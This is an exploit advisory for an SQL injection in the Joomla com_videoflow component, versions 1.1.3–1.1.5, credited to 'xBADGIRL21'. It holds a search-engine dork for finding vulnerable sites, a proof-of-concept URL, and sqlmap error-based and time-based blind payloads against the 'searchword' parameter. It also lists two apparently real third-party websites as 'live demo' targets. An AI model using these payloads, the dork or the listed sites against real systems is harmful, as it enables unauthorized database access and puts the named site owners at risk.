######################
#       ____    _    ____   ____ ___ ____  _     ____  _
# __  _| __ )  / \  |  _ \ / ___|_ _|  _ \| |   |___ \/ |
# \ \/ /  _ \ / _ \ | | | | |  _ | || |_) | |     __) | |
#  >  <| |_) / ___ \| |_| | |_| || ||  _ <| |___ / __/| |
# /_/\_\____/_/   \_\____/ \____|___|_| \_\_____|_____|_|
#
######################
# Exploit Title : Joomla com_videoflow SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_videoflow
# Vendor Homepage : http://www.fidsoft.com
# version : 1.1.3 - 1.1.5
# Tested on: [ BACK BOX]
# skype:xbadgirl21
# Date: 04/08/2016
# video Proof : https://www.youtube.com/watch?v=o16dZdO-Q9U
######################
# [+] DESCRIPTION :
######################
# [+] VideoFlow is a multimedia system for Joomla! and Facebook that makes
sharing multimedia content across
# [+] the two platforms a breeze. Visit www.videoflow.tv for more
information, support and demos.
# [+] AND an SQL injection been Detected in this Joomla components
videoflow after you add ['] to
# [+] Vuln Target Parameter you will get error like :
# [!] You have an error in your SQL syntax; check the manual that
corresponds to your MySQL
# [!] server version for the right syntax to use near ''' at line 1
SQL=SELECT
######################
# [+] Poc :
######################
# [searchword] Get Parameter Vulnerable To SQLi
#
http://127.0.0.1/index.php?option=com_videoflow&task=search&vs=1&searchword=1
'
######################
# [+] SQLmap PoC:
######################
# ---
#Parameter: searchword (GET)
#   Type: error-based
#   Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
#   Payload: option=com_videoflow&task=search&vs=1&searchword=1') AND
(SELECT 9107 FROM(SELECT COUNT(*),CONCAT(0x71716a7171,(SELECT
 #(ELT(9107=9107,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('fDLe'='fDLe

#   Type: AND/OR time-based blind
#   Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
#   Payload: option=com_videoflow&task=search&vs=1&searchword=1') AND
(SELECT * FROM (SELECT(SLEEP(5)))ImsR) AND ('yKcO'='yKcO
#
######################
# [!] Live Demo :
######################
#
http://egyptshortcuts.com/amrmabrouk/index.php?option=com_videoflow&task=search&vs=1&searchword=1
#
http://www.misitimi.gr/index.php?option=com_videoflow&task=search&vs=1&searchword=1
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################